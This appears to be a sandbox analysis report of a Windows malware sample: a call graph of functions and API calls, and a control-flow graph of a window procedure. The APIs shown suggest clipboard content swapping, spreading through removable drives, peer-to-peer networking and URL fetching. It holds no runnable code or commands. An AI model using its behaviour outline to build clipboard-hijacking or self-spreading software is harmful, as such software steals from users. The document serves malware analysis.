GetTickCount 5294->5297 5298 401a5f InterlockedExchangeAdd 5294->5298 5301 401a29 LeaveCriticalSection 5295->5301 5657 401820 5295->5657 5296->5293 5297->5293 5675 40d6e0 NtQuerySystemTime RtlTimeToSecondsSince1980 5298->5675 5299 401992 accept 5299->5289 5299->5305 5301->5293 5304 401a72 5304->5297 5304->5298 5676 40ad80 shutdown closesocket 5304->5676 5305->5289 5305->5299 5307 4019e9 5305->5307 5637 4022c0 5305->5637 5308 401cf0 7 API calls 5307->5308 5308->5289 5690 401470 5309->5690 5311 40d844 5312 40d872 5311->5312 5313 40d855 WaitForSingleObject 5311->5313 5314 401330 8 API calls 5313->5314 5315 40d86f 5314->5315 5315->5312 5317 4021cf 5316->5317 5318 4021bb 5316->5318 5317->5252 5317->5253 5318->5317 5341 402020 5318->5341 5321 40160d 5320->5321 5340 401737 5320->5340 5322 401619 EnterCriticalSection 5321->5322 5321->5340 5323 401630 5322->5323 5324 4016b5 LeaveCriticalSection SetEvent 5322->5324 5323->5324 5329 401641 InterlockedDecrement 5323->5329 5331 40165a InterlockedExchangeAdd 5323->5331 5338 4016a0 InterlockedDecrement 5323->5338 5325 4016d0 5324->5325 5326 4016e8 5324->5326 5327 4016d6 PostQueuedCompletionStatus 5325->5327 5328 40d510 11 API calls 5326->5328 5327->5326 5327->5327 5330 4016f3 5328->5330 5329->5323 5332 40d650 7 API calls 5330->5332 5331->5323 5333 40166d InterlockedIncrement 5331->5333 5334 4016fc CloseHandle CloseHandle WSACloseEvent 5332->5334 5363 401c50 WSARecv 5333->5363 5369 40ad80 shutdown closesocket 5334->5369 5337 401724 DeleteCriticalSection 5339 40a3f0 __aligned_recalloc_base 3 API calls 5337->5339 5338->5323 5339->5340 5340->5252 5342 409fd0 7 API calls 5341->5342 5343 40202b 5342->5343 5344 402038 GetSystemInfo InitializeCriticalSection CreateEventA 5343->5344 5345 4021aa 5343->5345 5346 402076 CreateIoCompletionPort 5344->5346 5347 40219f 5344->5347 5345->5317 5346->5347 5348 40208f 5346->5348 5349 401600 36 API calls 5347->5349 5350 40d370 8 API calls 5348->5350 5351 4021a5 5349->5351 5352 402094 5350->5352 5351->5345 5352->5347 5353 40209f WSASocketA 5352->5353 5353->5347 5354 4020bd setsockopt htons bind 5353->5354 5354->5347 5355 402126 listen 5354->5355 5355->5347 5356 40213a WSACreateEvent 5355->5356 5356->5347 5357 402147 WSAEventSelect 5356->5357 5357->5347 5358 402159 5357->5358 5359 40217f 5358->5359 5360 40d3a0 326 API calls 5358->5360 5361 40d3a0 326 API calls 5359->5361 5360->5358 5362 402194 5361->5362 5362->5317 5364 401cd2 5363->5364 5365 401c8e 5363->5365 5364->5323 5366 401c90 WSAGetLastError 5365->5366 5367 401ca4 Sleep WSARecv 5365->5367 5368 401cdb 5365->5368 5366->5364 5366->5365 5367->5364 5367->5366 5368->5323 5369->5337 5371 401ef2 InterlockedDecrement setsockopt closesocket 5370->5371 5372 401d74 5370->5372 5389 401e39 5371->5389 5372->5371 5373 401d7c 5372->5373 5390 40d6e0 NtQuerySystemTime RtlTimeToSecondsSince1980 5373->5390 5375 401d81 InterlockedExchange 5376 401d98 5375->5376 5377 401e4e 5375->5377 5380 401da9 InterlockedDecrement 5376->5380 5381 401dbc InterlockedDecrement InterlockedExchangeAdd 5376->5381 5376->5389 5378 401e67 5377->5378 5379 401e57 InterlockedDecrement 5377->5379 5382 401e72 5378->5382 5383 401e87 InterlockedDecrement 5378->5383 5379->5261 5380->5261 5385 401e2f 5381->5385 5399 401ae0 WSASend 5382->5399 5384 401ee9 5383->5384 5384->5261 5391 401cf0 5385->5391 5387 401e7e 5387->5261 5389->5261 5390->5375 5392 401d00 InterlockedExchangeAdd 5391->5392 5393 401cfc 5391->5393 5394 401d53 5392->5394 5395 401d17 InterlockedIncrement 5392->5395 5393->5389 5394->5389 5396 401c50 4 API calls 5395->5396 5397 401d46 5396->5397 5397->5394 5398 401d4c InterlockedDecrement 5397->5398 5398->5394 5400 401b50 5399->5400 5401 401b12 WSAGetLastError 5399->5401 5400->5387 5401->5400 5402 401b1f 5401->5402 5403 401b56 5402->5403 5404 401b26 Sleep WSASend 5402->5404 5403->5387 5404->5400 5404->5401 5406 40b477 LeaveCriticalSection 5405->5406 5407 40b45f 5405->5407 5406->5272 5408 40c100 3 API calls 5407->5408 5409 40b46a 5408->5409 5409->5406 5411 40cd26 5410->5411 5412 40cd2d 5410->5412 5411->5272 5428 40d000 5412->5428 5415 40cd4d InterlockedIncrement 5418 40cd57 5415->5418 5417 40cd80 5438 40ac60 inet_ntoa 5417->5438 5418->5417 5421 40ce50 InterlockedDecrement 5418->5421 5425 40cda4 5418->5425 5435 40b760 5418->5435 5420 40cd8c 5420->5421 5453 40ad80 shutdown closesocket 5421->5453 5423 40a1e0 _invalid_parameter 7 API calls 5423->5425 5424 40cf30 6 API calls 5424->5425 5425->5418 5425->5423 5425->5424 5427 40a3f0 __aligned_recalloc_base 3 API calls 5425->5427 5439 40b7b0 5425->5439 5427->5425 5429 40d00d socket 5428->5429 5430 40d022 htons connect 5429->5430 5431 40d07f 5429->5431 5430->5431 5433 40d06a 5430->5433 5431->5429 5432 40cd3d 5431->5432 5432->5411 5432->5415 5454 40ad80 shutdown closesocket 5433->5454 5455 40b6c0 5435->5455 5438->5420 5447 40b7c1 5439->5447 5442 40a3f0 __aligned_recalloc_base 3 API calls 5443 40bb8f 5442->5443 5443->5425 5444 40bba0 25 API calls 5444->5447 5447->5444 5448 40b7df 5447->5448 5449 40b760 17 API calls 5447->5449 5450 40b0c0 32 API calls 5447->5450 5484 40bcf0 5447->5484 5491 40b490 EnterCriticalSection 5447->5491 5496 406e00 5447->5496 5501 406ea0 5447->5501 5506 406cd0 5447->5506 5513 406dd0 5447->5513 5448->5442 5449->5447 5450->5447 5453->5411 5454->5432 5456 40c140 3 API calls 5455->5456 5457 40b6cb 5456->5457 5458 40b6e7 lstrlenA 5457->5458 5459 40c3d0 7 API calls 5458->5459 5460 40b71d 5459->5460 5461 40b748 5460->5461 5465 40d760 5460->5465 5461->5418 5463 40a3f0 __aligned_recalloc_base 3 API calls 5463->5461 5468 401200 5465->5468 5467 40b73c 5467->5463 5469 401314 5468->5469 5470 40121d 5468->5470 5469->5467 5470->5469 5471 40a1e0 _invalid_parameter 7 API calls 5470->5471 5472 401247 memcpy htons 5471->5472 5473 4012ed 5472->5473 5474 401297 sendto 5472->5474 5477 40a3f0 __aligned_recalloc_base 3 API calls 5473->5477 5475 4012b6 InterlockedExchangeAdd 5474->5475 5476 4012e9 5474->5476 5475->5474 5478 4012cc 5475->5478 5476->5473 5479 40130a 5476->5479 5480 4012fc 5477->5480 5481 40a3f0 __aligned_recalloc_base 3 API calls 5478->5481 5482 40a3f0 __aligned_recalloc_base 3 API calls 5479->5482 5480->5467 5483 4012db 5481->5483 5482->5469 5483->5467 5485 40bd01 lstrlenA 5484->5485 5486 40c3d0 7 API calls 5485->5486 5488 40bd1f 5486->5488 5487 40bdaf 5487->5447 5488->5485 5490 40bd2b 5488->5490 5489 40a3f0 __aligned_recalloc_base 3 API calls 5489->5487 5490->5487 5490->5489 5494 40b4a8 5491->5494 5492 40b4e4 LeaveCriticalSection 5492->5447 5494->5492 5516 40d6e0 NtQuerySystemTime RtlTimeToSecondsSince1980 5494->5516 5495 40b4d3 5495->5492 5517 406e40 5496->5517 5499 406e39 5499->5447 5500 40d3a0 337 API calls 5500->5499 5502 406e40 75 API calls 5501->5502 5503 406ebf 5502->5503 5504 406eec 5503->5504 5532 406f00 5503->5532 5504->5447 5535 405f40 EnterCriticalSection 5506->5535 5508 406cea 5512 406d1d 5508->5512 5540 406d30 5508->5540 5511 40a3f0 __aligned_recalloc_base 3 API calls 5511->5512 5512->5447 5547 406000 EnterCriticalSection 5513->5547 5515 406df2 5515->5447 5516->5495 5520 406e53 5517->5520 5518 406e14 5518->5499 5518->5500 5520->5518 5521 405e50 EnterCriticalSection 5520->5521 5522 40ca60 71 API calls 5521->5522 5523 405e6e 5522->5523 5524 405f2b LeaveCriticalSection 5523->5524 5525 405e87 5523->5525 5528 405ea8 5523->5528 5524->5520 5526 405e91 memcpy 5525->5526 5527 405ea6 5525->5527 5526->5527 5529 40a3f0 __aligned_recalloc_base 3 API calls 5527->5529 5528->5527 5531 405f06 memcpy 5528->5531 5530 405f28 5529->5530 5530->5524 5531->5527 5533 40b6c0 17 API calls 5532->5533 5534 406f45 5533->5534 5534->5504 5537 405f5e 5535->5537 5536 405fea LeaveCriticalSection 5536->5508 5537->5536 5538 40a460 8 API calls 5537->5538 5539 405fbc 5538->5539 5539->5536 5541 40a1e0 _invalid_parameter 7 API calls 5540->5541 5542 406d42 memcpy 5541->5542 5543 40b6c0 17 API calls 5542->5543 5544 406dac 5543->5544 5545 40a3f0 __aligned_recalloc_base 3 API calls 5544->5545 5546 406d11 5545->5546 5546->5511 5572 40cac0 5547->5572 5550 406243 LeaveCriticalSection 5550->5515 5551 40ca60 71 API calls 5552 406039 5551->5552 5552->5550 5553 406094 memcpy 5552->5553 5571 406158 5552->5571 5555 40a3f0 __aligned_recalloc_base 3 API calls 5553->5555 5554 405c90 73 API calls 5559 406181 5554->5559 5557 4060b8 5555->5557 5556 40a3f0 __aligned_recalloc_base 3 API calls 5558 4061a2 5556->5558 5560 40a460 8 API calls 5557->5560 5558->5550 5561 4061b1 CreateFileW 5558->5561 5559->5556 5562 4060c8 5560->5562 5561->5550 5563 4061d4 5561->5563 5564 40a3f0 __aligned_recalloc_base 3 API calls 5562->5564 5566 4061f1 WriteFile 5563->5566 5567 40622f FlushFileBuffers CloseHandle 5563->5567 5565 4060ef 5564->5565 5568 40c3d0 7 API calls 5565->5568 5566->5563 5567->5550 5569 406125 5568->5569 5570 407280 69 API calls 5569->5570 5570->5571 5571->5554 5571->5559 5575 40c010 5572->5575 5577 40c021 5575->5577 5576 40a460 8 API calls 5576->5577 5577->5576 5578 40bf70 70 API calls 5577->5578 5580 40c03b 5577->5580 5582 407d30 68 API calls 5577->5582 5583 40c07b memcmp 5577->5583 5578->5577 5579 40a3f0 __aligned_recalloc_base 3 API calls 5581 406022 5579->5581 5580->5579 5581->5550 5581->5551 5582->5577 5583->5577 5583->5580 5585 409fd0 7 API calls 5584->5585 5586 4013bb CreateEventA socket 5585->5586 5587 4013f2 5586->5587 5588 4013fd 5586->5588 5589 401330 8 API calls 5587->5589 5590 401401 bind 5588->5590 5591 401462 5588->5591 5592 4013f8 5589->5592 5593 401444 CreateThread 5590->5593 5594 401434 5590->5594 5591->5277 5592->5588 5593->5591 5607 401100 5593->5607 5595 401330 8 API calls 5594->5595 5596 40143a 5595->5596 5596->5277 5598 401339 5597->5598 5599 40139b 5597->5599 5598->5599 5600 401341 SetEvent WaitForSingleObject CloseHandle 5598->5600 5599->5278 5601 40138b 5600->5601 5605 401369 5600->5605 5636 40ad80 shutdown closesocket 5601->5636 5603 40a3f0 GetCurrentProcessId HeapValidate HeapFree __aligned_recalloc_base 5603->5605 5604 401395 5606 40a3f0 __aligned_recalloc_base 3 API calls 5604->5606 5605->5601 5605->5603 5606->5599 5608 401115 ioctlsocket 5607->5608 5609 4011e4 5608->5609 5615 40113a 5608->5615 5611 40a3f0 __aligned_recalloc_base 3 API calls 5609->5611 5610 4011cd WaitForSingleObject 5610->5608 5610->5609 5612 4011ea 5611->5612 5613 40a220 9 API calls 5613->5615 5614 401168 recvfrom 5614->5610 5614->5615 5615->5610 5615->5613 5615->5614 5616 4011ad InterlockedExchangeAdd 5615->5616 5618 401000 5616->5618 5619 401014 5618->5619 5620 40103b 5619->5620 5621 409fd0 7 API calls 5619->5621 5629 40d6e0 NtQuerySystemTime RtlTimeToSecondsSince1980 5620->5629 5621->5620 5623 40105b 5630 401580 5623->5630 5625 401071 5626 4010ec 5625->5626 5627 4010a3 IsBadReadPtr 5625->5627 5628 4010d8 memmove 5625->5628 5626->5615 5627->5625 5628->5625 5629->5623 5631 401592 5630->5631 5632 4015a5 memcpy 5630->5632 5633 40a220 9 API calls 5631->5633 5634 4015c1 5632->5634 5635 40159f 5633->5635 5634->5625 5635->5632 5636->5604 5638 4022d2 EnterCriticalSection 5637->5638 5639 4022cd 5637->5639 5640 4022fd LeaveCriticalSection 5638->5640 5643 4022e7 5638->5643 5639->5305 5641 402308 5640->5641 5642 40230f 5640->5642 5641->5305 5644 409fd0 7 API calls 5642->5644 5643->5640 5645 402319 5644->5645 5646 402326 getpeername CreateIoCompletionPort 5645->5646 5647 4023b8 5645->5647 5649 4023b2 5646->5649 5650 402366 5646->5650 5679 40ad80 shutdown closesocket 5647->5679 5651 40a3f0 __aligned_recalloc_base 3 API calls 5649->5651 5677 40d6e0 NtQuerySystemTime RtlTimeToSecondsSince1980 5650->5677 5651->5647 5652 4023c3 5652->5305 5654 40236b InterlockedExchange InitializeCriticalSection InterlockedIncrement 5678 4021e0 EnterCriticalSection LeaveCriticalSection 5654->5678 5656 4023ab 5656->5305 5658 40190f 5657->5658 5659 401830 5657->5659 5658->5296 5659->5658 5660 40183d InterlockedExchangeAdd 5659->5660 5660->5658 5666 401854 5660->5666 5661 401880 5662 401891 5661->5662 5689 40ad80 shutdown closesocket 5661->5689 5665 4018a7 InterlockedDecrement 5662->5665 5667 401901 5662->5667 5665->5667 5666->5658 5666->5661 5680 4017a0 EnterCriticalSection 5666->5680 5668 402247 5667->5668 5669 402265 EnterCriticalSection 5667->5669 5668->5296 5670 40229c LeaveCriticalSection DeleteCriticalSection 5669->5670 5673 40227d 5669->5673 5671 40a3f0 __aligned_recalloc_base 3 API calls 5670->5671 5671->5668 5672 40a3f0 GetCurrentProcessId HeapValidate HeapFree __aligned_recalloc_base 5672->5673 5673->5672 5674 40229b 5673->5674 5674->5670 5675->5304 5676->5304 5677->5654 5678->5656 5679->5652 5681 401807 LeaveCriticalSection 5680->5681 5682 4017ba InterlockedExchangeAdd 5680->5682 5681->5666 5683 4017ca LeaveCriticalSection 5682->5683 5684 4017d9 5682->5684 5683->5666 5685 40a3f0 __aligned_recalloc_base 3 API calls 5684->5685 5686 4017fe 5685->5686 5687 40a3f0 __aligned_recalloc_base 3 API calls 5686->5687 5688 401804 5687->5688 5688->5681 5689->5662 5691 401483 5690->5691 5697 401572 5690->5697 5692 409fd0 7 API calls 5691->5692 5691->5697 5693 401498 CreateEventA socket 5692->5693 5694 4014da 5693->5694 5695 4014cf 5693->5695 5694->5697 5698 4014e2 htons setsockopt bind 5694->5698 5696 401330 8 API calls 5695->5696 5699 4014d5 5696->5699 5697->5311 5700 401546 5698->5700 5701 401558 CreateThread 5698->5701 5699->5694 5702 401330 8 API calls 5700->5702 5701->5697 5704 401100 20 API calls __aligned_recalloc_base 5701->5704 5703 40154c 5702->5703 5703->5311 5706 405829 memset GetModuleHandleW 5705->5706 5707 405862 Sleep GetTickCount GetTickCount wsprintfW RegisterClassExW 5706->5707 5707->5707 5708 4058a0 CreateWindowExW 5707->5708 5709 4058cb 5708->5709 5710 4058cd GetMessageA 5708->5710 5711 4058ff ExitThread 5709->5711 5712 4058e1 TranslateMessage DispatchMessageA 5710->5712 5713 4058f7 5710->5713 5712->5710 5713->5706 5713->5711 5736 40e9b0 CreateFileW 5714->5736 5716 406cb8 ExitThread 5718 406b60 5718->5716 5719 406ca8 Sleep 5718->5719 5720 406b99 5718->5720 5739 406340 GetLogicalDrives 5718->5739 5719->5718 5745 406260 5720->5745 5723 406bd0 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5725 406c46 wsprintfW 5723->5725 5726 406c5b wsprintfW 5723->5726 5724 406bcb 5725->5726 5751 406650 _chkstk 5726->5751 5734 4073d7 5729->5734 5730 4074b1 Sleep 5730->5734 5731 4073ff Sleep 5731->5734 5732 40742e Sleep wsprintfA DeleteUrlCacheEntry 5804 40ec70 InternetOpenA 5732->5804 5734->5730 5734->5731 5734->5732 5735 40ed20 64 API calls 5734->5735 5735->5734 5737 40e9f8 5736->5737 5738 40e9df GetFileSize FindCloseChangeNotification 5736->5738 5737->5718 5738->5737 5744 40636d 5739->5744 5740 4063e6 5740->5718 5741 40637c RegOpenKeyExW 5742 40639e RegQueryValueExW 5741->5742 5741->5744 5743 4063da RegCloseKey 5742->5743 5742->5744 5743->5744 5744->5740 5744->5741 5744->5743 5746 4062b9 5745->5746 5747 40627c 5745->5747 5746->5723 5746->5724 5786 4062c0 GetDriveTypeW 5747->5786 5750 4062ab lstrcpyW 5750->5746 5752 406667 5751->5752 5753 40666e 6 API calls 5751->5753 5752->5724 5754 406722 5753->5754 5755 406764 PathFileExistsW 5753->5755 5756 40e9b0 3 API calls 5754->5756 5757 4067e0 PathFileExistsW 5755->5757 5758 406775 PathFileExistsW 5755->5758 5761 40672e 5756->5761 5759 4067f1 5757->5759 5760 406836 FindFirstFileW 5757->5760 5762 406786 CreateDirectoryW 5758->5762 5763 4067a8 PathFileExistsW 5758->5763 5764 406811 5759->5764 5765 4067f9 5759->5765 5760->5752 5784 40685d 5760->5784 5761->5755 5766 406745 SetFileAttributesW DeleteFileW 5761->5766 5762->5763 5767 406799 SetFileAttributesW 5762->5767 5763->5757 5768 4067b9 CopyFileW 5763->5768 5770 406400 3 API calls 5764->5770 5791 406400 CoInitialize CoCreateInstance 5765->5791 5766->5755 5767->5763 5768->5757 5772 4067d1 SetFileAttributesW 5768->5772 5773 40680c SetFileAttributesW 5770->5773 5771 40691f lstrcmpW 5774 406935 lstrcmpW 5771->5774 5771->5784 5772->5757 5773->5760 5774->5784 5776 406af6 FindNextFileW 5776->5771 5777 406b12 FindClose 5776->5777 5777->5752 5778 40697b lstrcmpiW 5778->5784 5779 4069e2 PathMatchSpecW 5780 406a03 wsprintfW SetFileAttributesW DeleteFileW 5779->5780 5779->5784 5780->5784 5781 406a60 PathFileExistsW 5782 406a76 wsprintfW wsprintfW 5781->5782 5781->5784 5783 406ae0 MoveFileExW 5782->5783 5782->5784 5783->5776 5784->5771 5784->5776 5784->5778 5784->5779 5784->5781 5795 406510 CreateDirectoryW wsprintfW FindFirstFileW 5784->5795 5787 40629f 5786->5787 5788 4062e8 5786->5788 5787->5746 5787->5750 5788->5787 5789 4062fc QueryDosDeviceW 5788->5789 5789->5787 5790 406316 StrCmpNW 5789->5790 5790->5787 5792 406436 5791->5792 5794 406472 5791->5794 5793 406440 wsprintfW 5792->5793 5792->5794 5793->5794 5794->5773 5796 406565 lstrcmpW 5795->5796 5797 40663f 5795->5797 5798 406591 5796->5798 5799 40657b lstrcmpW 5796->5799 5797->5784 5801 40660c FindNextFileW 5798->5801 5799->5798 5800 406593 wsprintfW wsprintfW 5799->5800 5800->5798 5803 4065f6 MoveFileExW 5800->5803 5801->5796 5802 406628 FindClose RemoveDirectoryW 5801->5802 5802->5797 5803->5801 5805 40ec96 InternetOpenUrlA 5804->5805 5806 40ed08 Sleep 5804->5806 5807 40ecb5 HttpQueryInfoA 5805->5807 5808 40ecfe InternetCloseHandle 5805->5808 5806->5734 5809 40ecf4 InternetCloseHandle 5807->5809 5810 40ecde 5807->5810 5808->5806 5809->5808 5810->5809 5811 405910 GetWindowLongW 5812 405934 5811->5812 5813 405956 5811->5813 5814 405941 5812->5814 5815 4059c7 IsClipboardFormatAvailable 5812->5815 5817 4059a6 5813->5817 5818 40598e SetWindowLongW 5813->5818 5823 405951 5813->5823 5821 405964 SetClipboardViewer SetWindowLongW 5814->5821 5822 405947 5814->5822 5819 4059e3 IsClipboardFormatAvailable 5815->5819 5820 4059da 5815->5820 5816 405b44 DefWindowProcA 5817->5823 5824 4059ac SendMessageA 5817->5824 5818->5823 5819->5820 5825 4059f8 IsClipboardFormatAvailable 5819->5825 5827 405a15 OpenClipboard 5820->5827 5828 405adf 5820->5828 5821->5816 5822->5823 5826 405afd RegisterRawInputDevices ChangeClipboardChain 5822->5826 5823->5816 5824->5823 5825->5820 5826->5816 5827->5828 5830 405a25 GetClipboardData 5827->5830 5828->5823 5829 405ae5 SendMessageA 5828->5829 5829->5823 5830->5823 5831 405a3d GlobalLock 5830->5831 5831->5823 5832 405a55 5831->5832 5833 405a68 5832->5833 5834 405a89 5832->5834 5835 405a9e 5833->5835 5836 405a6e 5833->5836 5837 405630 13 API calls 5834->5837 5853 405750 5835->5853 5838 405a74 GlobalUnlock CloseClipboard 5836->5838 5847 405510 5836->5847 5837->5838 5838->5828 5842 405ac7 5838->5842 5861 4048a0 lstrlenW 5842->5861 5845 40a3f0 __aligned_recalloc_base 3 API calls 5846 405adc 5845->5846 5846->5828 5849 40551b 5847->5849 5848 405521 lstrlenW 5848->5849 5850 405534 5848->5850 5849->5848 5849->5850 5851 40a1e0 _invalid_parameter 7 API calls 5849->5851 5852 405551 lstrcpynW 5849->5852 5850->5838 5851->5849 5852->5849 5852->5850 5858 40575d 5853->5858 5854 405763 lstrlenA 5855 405776 5854->5855 5854->5858 5855->5838 5856 4055d0 2 API calls 5856->5858 5857 40a1e0 _invalid_parameter 7 API calls 5857->5858 5858->5854 5858->5855 5858->5856 5858->5857 5860 40a3f0 __aligned_recalloc_base 3 API calls 5858->5860 5898 405700 5858->5898 5860->5858 5862 4048d4 5861->5862 5871 404c69 StrStrW 5862->5871 5872 404ae2 5862->5872 5875 404af4 5862->5875 5863 404d5e StrStrW 5864 404d71 5863->5864 5865 404d75 StrStrW 5863->5865 5864->5865 5866 404d88 5865->5866 5867 404d8c StrStrW 5865->5867 5866->5867 5868 404d9f 5867->5868 5869 404e09 isalpha 5868->5869 5868->5872 5882 404e43 5868->5882 5869->5868 5870 404e20 isdigit 5869->5870 5870->5868 5870->5872 5873 404c94 StrStrW 5871->5873 5871->5875 5872->5845 5874 404cbf StrStrW 5873->5874 5873->5875 5874->5875 5875->5863 5875->5872 5876 405351 StrStrW 5880 405364 5876->5880 5881 40536b StrStrW 5876->5881 5877 405303 StrStrW 5878 405316 5877->5878 5879 40531d StrStrW 5877->5879 5878->5879 5883 405330 5879->5883 5884 405337 StrStrW 5879->5884 5880->5881 5885 405385 StrStrW 5881->5885 5886 40537e 5881->5886 5882->5876 5882->5877 5883->5884 5884->5876 5889 40534a 5884->5889 5887 405398 5885->5887 5888 40539f StrStrW 5885->5888 5886->5885 5887->5888 5890 4053b2 5888->5890 5891 4053b9 StrStrW 5888->5891 5889->5876 5890->5891 5892 4053cc lstrlenA 5891->5892 5892->5872 5894 405492 GlobalAlloc 5892->5894 5894->5872 5895 4054ad GlobalLock 5894->5895 5895->5872 5896 4054c0 memcpy GlobalUnlock OpenClipboard 5895->5896 5896->5872 5897 4054ed EmptyClipboard SetClipboardData CloseClipboard 5896->5897 5897->5872 5899 40570b 5898->5899 5900 405711 lstrlenA 5899->5900 5901 4055d0 2 API calls 5899->5901 5902 405744 5899->5902 5900->5899 5901->5899 5902->5858 5953 40ccd0 5958 40af80 5953->5958 5955 40ccfa 5957 40cd10 337 API calls 5957->5955 5959 40b010 2 API calls 5958->5959 5960 40af8f 5959->5960 5961 40af9d EnterCriticalSection 5960->5961 5962 40af99 5960->5962 5963 40afbc LeaveCriticalSection 5961->5963 5962->5955 5962->5957 5963->5962 5965 40d310 5970 401b60 5965->5970 5967 40d325 5968 401b60 16 API calls 5967->5968 5969 40d344 5967->5969 5968->5969 5971 401c42 5970->5971 5972 401b70 5970->5972 5971->5967 5972->5971 5973 409fd0 7 API calls 5972->5973 5974 401b9d 5973->5974 5974->5971 5975 40a460 8 API calls 5974->5975 5976 401bc9 5975->5976 5977 401be6 5976->5977 5978 401bd6 5976->5978 5979 401ae0 4 API calls 5977->5979 5980 40a3f0 __aligned_recalloc_base 3 API calls 5978->5980 5981 401bf3 5979->5981 5982 401bdc 5980->5982 5983 401c33 5981->5983 5984 401bfc EnterCriticalSection 5981->5984 5982->5967 5987 40a3f0 __aligned_recalloc_base 3 API calls 5983->5987 5985 401c13 5984->5985 5986 401c1f LeaveCriticalSection 5984->5986 5985->5986 5986->5967 5988 401c3c 5987->5988 5989 40a3f0 __aligned_recalloc_base 3 API calls 5988->5989 5989->5971 5990 40d710 5991 40b7b0 337 API calls 5990->5991 5992 40d748 5991->5992 5993 40d190 5994 40d1a6 5993->5994 6008 40d1fe 5993->6008 5995 40d1b0 5994->5995 5996 40d203 5994->5996 5997 40d253 5994->5997 5994->6008 6000 409fd0 7 API calls 5995->6000 5998 40d228 5996->5998 5999 40d21b InterlockedDecrement 5996->5999 6020 40be00 5997->6020 6002 40a3f0 __aligned_recalloc_base 3 API calls 5998->6002 5999->5998 6003 40d1bd 6000->6003 6004 40d234 6002->6004 6016 4023d0 6003->6016 6006 40a3f0 __aligned_recalloc_base 3 API calls 6004->6006 6006->6008 6009 40af80 4 API calls 6010 40d1df 6009->6010 6010->6008 6011 40d1eb InterlockedIncrement 6010->6011 6011->6008 6012 40d279 6012->6008 6013 40d2b1 IsBadReadPtr 6012->6013 6015 40b7b0 337 API calls 6012->6015 6025 40bf00 6012->6025 6013->6012 6015->6012 6017 402413 6016->6017 6018 4023d9 6016->6018 6017->6009 6018->6017 6019 4023ea InterlockedIncrement 6018->6019 6019->6017 6021 40be13 6020->6021 6022 40be3d memcpy 6020->6022 6023 40a220 9 API calls 6021->6023 6022->6012 6024 40be34 6023->6024 6024->6022 6026 40bf29 6025->6026 6027 40bf1e 6025->6027 6026->6027 6028 40bf41 memmove 6026->6028 6027->6012 6028->6027 6085 40ce70 6090 40ced0 6085->6090 6088 40ce9e 6089 40ced0 send 6089->6088 6091 40cee1 send 6090->6091 6092 40ce83 6091->6092 6093 40cefe 6091->6093 6092->6088 6092->6089 6093->6091 6093->6092 6029 40f0dc 6030 40f0e4 6029->6030 6031 40f198 6030->6031 6035 40f319 6030->6035 6034 40f11d 6034->6031 6039 40f204 RtlUnwind 6034->6039 6036 40f32e 6035->6036 6038 40f34a 6035->6038 6037 40f3b9 NtQueryVirtualMemory 6036->6037 6036->6038 6037->6038 6038->6034 6040 40f21c 6039->6040 6040->6034 6041 405f1d 6042 405eb1 6041->6042 6045 405f06 memcpy 6042->6045 6046 405f1b 6042->6046 6043 40a3f0 __aligned_recalloc_base 3 API calls 6044 405f28 LeaveCriticalSection 6043->6044 6045->6046 6046->6043

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 164 405910-405932 GetWindowLongW 165 405934-40593b 164->165 166 405956-40595d 164->166 167 405941-405945 165->167 168 4059c7-4059d8 IsClipboardFormatAvailable 165->168 169 405986-40598c 166->169 170 40595f 166->170 176 405964-405981 SetClipboardViewer SetWindowLongW 167->176 177 405947-40594b 167->177 174 4059e3-4059ed IsClipboardFormatAvailable 168->174 175 4059da-4059e1 168->175 172 4059a6-4059aa 169->172 173 40598e-4059a4 SetWindowLongW 169->173 171 405b44-405b5d DefWindowProcA 170->171 178 4059c2 172->178 179 4059ac-4059bc SendMessageA 172->179 173->178 181 4059f8-405a02 IsClipboardFormatAvailable 174->181 182 4059ef-4059f6 174->182 180 405a0b-405a0f 175->180 176->171 183 405951 177->183 184 405afd-405b3e RegisterRawInputDevices ChangeClipboardChain 177->184 178->171 179->178 186 405a15-405a1f OpenClipboard 180->186 187 405adf-405ae3 180->187 181->180 185 405a04 181->185 182->180 183->171 184->171 185->180 186->187 190 405a25-405a36 GetClipboardData 186->190 188 405ae5-405af5 SendMessageA 187->188 189 405afb 187->189 188->189 189->171 191 405a38 190->191 192 405a3d-405a4e GlobalLock 190->192 191->171 193 405a50 192->193 194 405a55-405a66 192->194 193->171 195 405a68-405a6c 194->195 196 405a89-405a9c call 405630 194->196 197 405a9e-405aae call 405750 195->197 198 405a6e-405a72 195->198 204 405ab1-405ac5 GlobalUnlock CloseClipboard 196->204 197->204 200 405a74 198->200 201 405a76-405a87 call 405510 198->201 200->204 201->204 204->187 207 405ac7-405adc call 4048a0 call 40a3f0 204->207 207->187
                                                                          APIs
                                                                          • GetWindowLongW.USER32(?,000000EB), ref: 0040591C
                                                                          • SetClipboardViewer.USER32(?), ref: 00405968
                                                                          • SetWindowLongW.USER32(?,000000EB,?), ref: 0040597B
                                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 004059D0
                                                                          • OpenClipboard.USER32(00000000), ref: 00405A17
                                                                          • GetClipboardData.USER32(00000000), ref: 00405A29
                                                                          • RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405B30
                                                                          • ChangeClipboardChain.USER32(?,?), ref: 00405B3E
                                                                          • DefWindowProcA.USER32(?,?,?,?), ref: 00405B54
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.4535612584.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.4535595957.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535628252.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535642295.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 00000003.00000002.4535655290.0000000000416000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_135143440.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                                                          • String ID:
                                                                          • API String ID: 3549449529-0
                                                                          • Opcode ID: 9a76300ceb1b56ddf8e5a4871e9e763aee277b276f745e0ebd9c557249eb211d
                                                                          • Instruction ID: e885106aa0884b4502b2237862738d0df8f48eeaae93079a212bc481fb1f7e33
                                                                          • Opcode Fuzzy Hash: 9a76300ceb1b56ddf8e5a4871e9e763aee277b276f745e0ebd9c557249eb211d
